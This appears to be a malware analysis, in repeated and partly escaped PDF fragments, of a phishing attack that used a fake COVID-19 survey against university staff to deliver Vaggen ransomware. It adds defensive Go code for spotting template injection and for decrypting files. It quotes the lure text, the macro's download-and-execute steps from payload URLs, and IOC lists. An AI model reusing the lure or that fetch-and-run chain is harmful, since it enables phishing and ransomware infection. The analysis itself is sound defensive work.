Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2660 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2661 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2662 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2663 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2664 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2665 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2666 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2667 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2668 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2669 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2670 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.

In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.

However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.

On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.

Mandatory COVID-19 survey distributed to targeted recipients

The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.

This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.

The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):

Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!

You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!

In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!

According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately, instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.

Phishing document analysis

The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
That file was uploaded to a free code hosting website (notabug.org).

When the macro is executed, it does the following:

- Gets the %APPDATA% directory
- Creates the Byxor directory in %APPDATA%
- Downloads a file from the following URL and writes it as Polisen.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
- Downloads a file from the following URL and writes it as Killar.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
- Calls the Shell function to execute killar.exe
- Checks the return value of the Shell function to see whether it was successful (on success the return value is the task ID of the executed application)
- If successful, it sends an HTTP GET request to: canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
- If it isn’t successful, it sends an HTTP GET request to: canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html

We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.

Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event. This can be very useful as an early warning notification system that an intruder has had access to a network.
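Template injection of this kind leaves a visible trace inside the document itself: a .docx is a ZIP container, and the template Word fetches on open is declared as an attachedTemplate relationship in word/_rels/settings.xml.rels, with TargetMode="External" when it is a URL rather than a local path. The Go program below is an added example of checking for that on the receiving side (mail gateway, sandbox, or triage script); it is my own code, not code from the original post or from Malwarebytes. The function names, the constructed fixture and the example.invalid URL are assumptions of mine; the part name, relationship type and TargetMode attribute are standard OOXML.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io"
	"net/url"
	"strings"
)

// relationships mirrors the OOXML .rels schema. An attachedTemplate relationship in
// word/_rels/settings.xml.rels names the template Word loads when the document opens;
// TargetMode="External" means the target is a URL outside the package.
type relationships struct {
	Rels []struct {
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

const settingsRels = "word/_rels/settings.xml.rels"

// RemoteTemplate is one external template reference found in a document.
type RemoteTemplate struct {
	Target string // URL as written in the document
	Host   string // its host, for matching against blocklists or code-hosting sites
}

// FindRemoteTemplates parses a .docx held in memory (it is a ZIP container) and
// returns every attachedTemplate relationship whose target is external, whether
// declared via TargetMode or written as an http(s) URL. A local template
// (relative path, no TargetMode) is not reported.
func FindRemoteTemplates(docx []byte) ([]RemoteTemplate, error) {
	zr, err := zip.NewReader(bytes.NewReader(docx), int64(len(docx)))
	if err != nil {
		return nil, fmt.Errorf("not an OOXML container: %w", err)
	}
	var found []RemoteTemplate
	for _, f := range zr.File {
		if f.Name != settingsRels {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		raw, err := io.ReadAll(rc)
		rc.Close()
		if err != nil {
			return nil, err
		}
		var rels relationships
		if err := xml.Unmarshal(raw, &rels); err != nil {
			return nil, fmt.Errorf("malformed %s: %w", settingsRels, err)
		}
		for _, r := range rels.Rels {
			if !strings.HasSuffix(r.Type, "/attachedTemplate") {
				continue
			}
			u, perr := url.Parse(r.Target)
			isURL := perr == nil && (u.Scheme == "http" || u.Scheme == "https")
			if strings.EqualFold(r.TargetMode, "External") || isURL {
				host := ""
				if perr == nil {
					host = u.Host
				}
				found = append(found, RemoteTemplate{Target: r.Target, Host: host})
			}
		}
	}
	return found, nil
}

// buildSampleDocx writes a minimal, constructed .docx containing only the settings
// relationships part. It is a test fixture; real documents carry many more parts.
func buildSampleDocx(templateTarget, targetMode string) []byte {
	mode := ""
	if targetMode != "" {
		mode = ` TargetMode="` + targetMode + `"`
	}
	rels := `<?xml version="1.0" encoding="UTF-8"?>` +
		`<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">` +
		`<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"` +
		` Target="` + templateTarget + `"` + mode + `/></Relationships>`
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	w, err := zw.Create(settingsRels)
	if err != nil {
		panic(err)
	}
	if _, err = w.Write([]byte(rels)); err != nil {
		panic(err)
	}
	if err = zw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

func main() {
	// Placeholder URL, not an indicator from this report.
	hits, err := FindRemoteTemplates(buildSampleDocx("https://example.invalid/raw/master/template.dotm", "External"))
	if err != nil {
		panic(err)
	}
	fmt.Printf("%+v\n", hits)
}
```

The host reported for each hit is what a gateway would compare against its blocklist or against free code-hosting domains such as the one used here; a document whose template resolves anywhere outside the organisation deserves detonation rather than delivery. Note that the same check on a .dotm already in hand will only show the template chain, not the macro, so it complements rather than replaces macro extraction.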
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. Several of them can be renamed according to what they do:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is deployed as the callback of the standard Golang function path/filepath.Walk.

Files are encrypted with AES-256 (32 byte long key) in GCM mode. The encryption algorithm is similar to the one demonstrated here.
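The write-up’s description of the .VAGGEN format (a 12-byte nonce, then the gcm.Seal output, which is the ciphertext followed by the 16-byte GCM tag, all under a single hardcoded 32-byte key) is enough to build a recovery tool, which is why this family can be decrypted without paying. The Go program below is an added example of exactly that; it is my own code, not the malware’s and not a tool from the original post. The key string, nonce and tag sizes and the file layout are the write-up’s; the function names and the constructed sample plaintext are assumptions of mine, and crypto/rand stands in for the CryptGenRandom call the malware uses when the fixture is built.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// Key recovered from the sample (quoted in the write-up). 32 bytes, hence AES-256.
const vaggenKey = "du_tar_mitt_hjart_mina_pengarna0"

const (
	nonceSize = 12 // nonce length the malware stores in front of the ciphertext
	tagSize   = 16 // GCM tag length gcm.Seal appends after the ciphertext
)

// ParseVaggenFile splits a .VAGGEN file into the stored nonce and the sealed
// blob (ciphertext || tag). It rejects files too short to hold both.
func ParseVaggenFile(data []byte) (nonce, sealed []byte, err error) {
	if len(data) < nonceSize+tagSize {
		return nil, nil, errors.New("file too short to contain a nonce and a GCM tag")
	}
	return data[:nonceSize], data[nonceSize:], nil
}

// RecoverVaggenFile decrypts one .VAGGEN file with the given 32-byte key.
// Because GCM authenticates, a wrong key or a truncated or corrupted file
// fails with an error rather than yielding garbage.
func RecoverVaggenFile(data, key []byte) ([]byte, error) {
	nonce, sealed, err := ParseVaggenFile(data)
	if err != nil {
		return nil, err
	}
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	plaintext, err := gcm.Open(nil, nonce, sealed, nil)
	if err != nil {
		return nil, fmt.Errorf("GCM authentication failed (wrong key or damaged file): %w", err)
	}
	return plaintext, nil
}

// newGCM builds the AES-256-GCM instance; cipher.NewGCM uses the standard
// 12-byte nonce and 16-byte tag, matching the sizes seen in the files.
func newGCM(key []byte) (cipher.AEAD, error) {
	if len(key) != 32 {
		return nil, fmt.Errorf("expected a 32-byte AES-256 key, got %d bytes", len(key))
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// makeSampleVaggenFile builds a constructed fixture in the same layout
// (nonce || gcm.Seal output) so the recovery path can be exercised offline.
// gcm.Seal appends to its first argument, so writing the nonce there first
// yields the on-disk layout directly.
func makeSampleVaggenFile(plaintext, key []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, nonceSize)
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	out := make([]byte, 0, nonceSize+len(plaintext)+tagSize)
	out = append(out, nonce...)
	return gcm.Seal(out, nonce, plaintext, nil), nil
}

func main() {
	key := []byte(vaggenKey)
	sample := []byte("constructed plaintext standing in for a victim's document")
	encrypted, err := makeSampleVaggenFile(sample, key)
	if err != nil {
		panic(err)
	}
	recovered, err := RecoverVaggenFile(encrypted, key)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered %d bytes, matches original: %v\n", len(recovered), bytes.Equal(recovered, sample))
}
```

For incident response the useful property is the authentication tag: a decryptor built this way cannot silently write a wrong plaintext over a backup, because a mismatched key or a partially written file makes gcm.Open return an error, so the original .VAGGEN file should be kept until the recovered output has been verified.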
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.

The content of the output file (with .VAGGEN extension) contains:

- the 12-byte nonce
- the encrypted content
- the 16-byte GCM tag

The hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content.

With all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.

However, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.

Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2715 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2716 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2717 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. 
In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2718 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: 